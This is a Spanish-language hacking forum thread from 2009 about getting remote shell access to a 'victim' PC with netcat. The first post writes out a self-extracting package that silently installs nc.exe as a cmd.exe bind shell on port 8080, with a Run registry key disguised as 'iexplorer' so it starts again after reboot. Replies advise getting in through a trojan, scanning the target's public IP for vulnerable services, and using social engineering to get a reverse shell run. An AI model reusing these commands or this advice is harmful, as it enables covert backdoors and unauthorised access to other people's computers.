Tema destacado: [Overclocking] Récords de overclock del foro
 Autor
|
Tema: Conexion remota con netcat (Leído 4,269 veces)
|
alexmacan
 Desconectado
Mensajes: 101
|
Buenass, parece ser que me ha dado ahora por aprender algo sobre la herramienta netcat, me estuve documentando y no he podido completar mis espectativas xD Lo que quiero es hacer una conexion remota a mi sobremesa mandando anteriormente el netcat Lo primero que hago es crear un autoextraible ayudandome de winrar, lo configuro de la siguiente manera, le digo que se extraiga en algun directorio. Por ejemplo %homedrive%%homepath%\Sys32 Hago que se ejecute esta linea despues de la extraccion: nc.exe -vv -d -L -p 8080 -e cmd.exe Pongo que se ejecute lo siguiente antes de la extraccion: %windir%\system32\cmd /c reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "iexplorer" /t REG_SZ /d "%homedrive%%homepath%\Sys32\nc.exe -vv -d -L -p 8080 -e cmd.exe" /f > nul ya lo restante que le pongo es algun iconito y que no me pregunte si sobreescribe algo, luego lo ejecuto en el ordenador de sobremesa y desde otro pc con otra conexión de internet(mi vecino juampi, que la madre hace unas galletas..  )) intento conectarme a él escribiendo en el cmd: telnet XX.XXX.XXX.XX 8080 donde XX es la ip, pero no consigo establecer la conexión, creo que lo que falla es un scan en el router para saber a que computadora dirigirse pero no se como se hace, alguna idea ??  Un Saludo y graciass  Edito: mm... he seguido leyendo y... solo sirve para conexiones locales..?? =( |
|
|
|
« Última modificación: 3 Octubre 2009, 16:21 por alexmacan »
|
En línea
|
|
|
|
Novlucker
Ninja y
Ex-Staff
Desconectado
Mensajes: 10.239
Yo que tu lo pienso dos veces
|
Intenta lo siguiente:
1- Ponerlo en modo telnet ... -t
2- Que la llave que agregas al inicio del registro sea un REG_EXPAND_SZ, y esta parte debe de ir con "porcentaje" doble .. %%homedrive%%%%homepath%%
Saludos
|
|
|
|
|
En línea
|
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
http://twitter.com/novlucker
"Hay dos cosas infinitas: el Universo y la estupidez humana. Y de la primera no estoy muy seguro." Albert Einstein |
|
|
|
|
alexmacan
Desconectado
Mensajes: 101
|
Graciasss era la flag -t pero ahora me surge una duda, si yo tubiese que mapear el router de mi casa, pero yo me encontrara fuera de ella, como seria, vamos lo que quiero es hacer un mapeo remoto usando su usr/pass de mi router, he estado leyendo y he visto un programa llamado nmap el cual he estado trasteando y visto un par de manuales, pero no he conseguido dar con las flags necesarias para hacer el mapeo  me podeis echar una manita??  muchas graciasss PD: siento no posteado desde el principio en hacking basico, tenia mis dudas de donde ponerlo, pero bueno ya esta movido Edit: una falta de ortografia |
|
|
|
« Última modificación: 4 Octubre 2009, 18:19 por alexmacan »
|
En línea
|
|
|
|
|
kamsky
|
para poder mapear un router ajeno, deberás tener acceso a el desd el exterior, osea que debe tener habilitado el acces remoto al panel de control...
si no fuera así (algo recomendable por otra parte), es algo más complicado, deberás de consguir acceso completo al host victima (por ejempl mediante un troyano), y una vez ahí, acceder desde la LAN interna a la configuracion del router
nmap es un scaner (bueno ahora ya con mil y una funcionalidades ), no tiene nada que ver con el mapeo de puertos d un router
salu2
|
|
|
|
|
En línea
|
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---
hack 4 free!!
|
|
|
alexmacan
Desconectado
Mensajes: 101
|
mm.... creo que lo del troyano no seria buena idea pues el problema es establecer una conexion a un ordenador que esta enrutado y no mapeado, voy a intentar explicar el caso lo mas detalladamente posible porque han cambiado algunas cosas, quiero dejar claro que siempre lo estoy haciendo con mis ordenadores router etc... aunque voy a utlizar terminos como PCVictima y PCAtacante para que las cosas se vean mas clara. El esquema seria el siguiente: PCAtacante----->|Router con mapeo al 8080 y PC Atacante|----Internet---->|Router|--->PCVictima el PCVictima tiene ejecutado el proceso nc.exe, es decir tiene el NetCat corriendo usando el puerto 8080 como anteriormente le dije que se comportara(Ver al principio) entonces si hago el: "telnet 33.XX.VIC.TI.MA 8080" creo que no se realiza la conexion porque cuando llega al router no sabe a que Pc dirigirse, hay alguna posible solucion?  |
|
|
|
|
En línea
|
|
|
|
|
kamsky
|
Según esto: PCAtacante----->|Router con mapeo al 8080 tienes mapeado el router... si no es así, lo único que tienes que hacer es entrar a la configuración del router, y mediante NAT habilitar el puerto entrante que quieras, y que el contenido de este se redirija al puerto 8080 del pc víctima |
|
|
|
|
En línea
|
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---
hack 4 free!!
|
|
|
alexmacan
Desconectado
Mensajes: 101
|
Esque en ese router no está el problema no? es el router del PC Victima, (es lo que creo, ya que no lo tengo claro) vamos lo digo porque si sustitullo el router del PCVictima por un CableModen de los antiguos que da conexion directa a internet, se establece la conexion sin problemas, por este motivo pienso que lo que falla es un mapeo en el RouterVictima no? o no es necesario y debo hacer otra cosa antes? Un Saludo |
|
|
|
|
En línea
|
|
|
|
|
kamsky
|
vale me equivoqué en la interpretación del diagrama, claro, el que tienes que mapear es el de la víctima, ya te dije los 2 métodos que hay...
si lo del troyano no lo ves viable, prueba a hacerle un scan con nmap a la ip pública a ver si por casualidad tuviese algo abierto
|
|
|
|
|
En línea
|
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---
hack 4 free!!
|
|
|
alexmacan
Desconectado
Mensajes: 101
|
Mmmm... es que pienso que tampoco me voy a poder conectar al troyano no? por el mismo tema lo del router y eso y si en vez de conectarme a su netcat, el netcat de la victima se conectara al atacante? Un Saludo y graciasss Edit: modificado terminologia inapropiada xD |
|
|
|
« Última modificación: 5 Octubre 2009, 23:06 por alexmacan »
|
En línea
|
|
|
|
|
kamsky
|
a ver, por lo que sea, desechamos lo del troyano en un principio
ahora puedes hacer lo que te he dicho, escanea con el nmap la IP pública en busca de servicios vulnerables que corran...
comodices, también puedes intentar conseguir una reverse shell, pero para eso necesitarás un poquito de ingenieria social para mandarle un programa que haga lo que digo y que el tipo lo ejecute..
|
|
|
|
|
En línea
|
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---
hack 4 free!!
|
|
|
alexmacan
Desconectado
Mensajes: 101
|
mmm esque como he dicho esto son pruebas que hago con mis dispositivos, al no ser un caso real nose que tipo de procesos corriendo puedo aprovechar, lo mas conocidos? aunque lo de la reverse Shell me perece interesante pues si tengo que usar la ingenieria social para que acepte y ejecute el NetCat, que es lo que doy por hecho, tambien lo podria hacer con otro programa en vez de netcat, pero Netcat no es capaz de hacer una reverse Shell? Saludos y gracias de nuevo |
|
|
|
|
En línea
|
|
|
|
|
kamsky
|
pues servidor Web,Ftp,Smtp... claro que puedes usar otro programa que no sea netcat, solo es una idea, y si, claro que puedes hacer un reverse shell con netcat, te animo a que te leas las chinchetas, en especial la que hay sobre trasteando con netcat salu2 |
|
|
|
|
En línea
|
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---
hack 4 free!!
|
|
|
miguel86
Desconectado
Mensajes: 258
|
Tal con el diagrama que has puesto, si es tu netcat quien se conecta al pc víctima (en el cual el netcat escucha conexiones en el 8080) el problema está en el router de la víctima (que tiene que tener habilitada la regla de NAT cuando entren segmentos al 8080), pero lo mejor es que sea su netcat el que se conecte al tuyo (que está escuchando en el 8080) de tal manera que sólo tienes que hacer el nat del 8080 de tu router hacia tu pc, y por supuesto que el router de la víctima tenga abierto el 8080. No hay más a partir de ahí apañatelas.
Salu2
|
|
|
|
« Última modificación: 6 Octubre 2009, 00:26 por miguel86 »
|
En línea
|
|
|
|
alexmacan
Desconectado
Mensajes: 101
|
Leere detenidamente las chichetas, pero antes se me plantea una duda. Si yo para hacer la conexion del PCAtacante al PCVcitima he tenido que hacer el mapeo del RouterDelAtacante, al intentar una reverse Shell el otro router(victima) tambien tendra que estar mapeado? |
|
|
|
|
En línea
|
|
|
|
|
 |
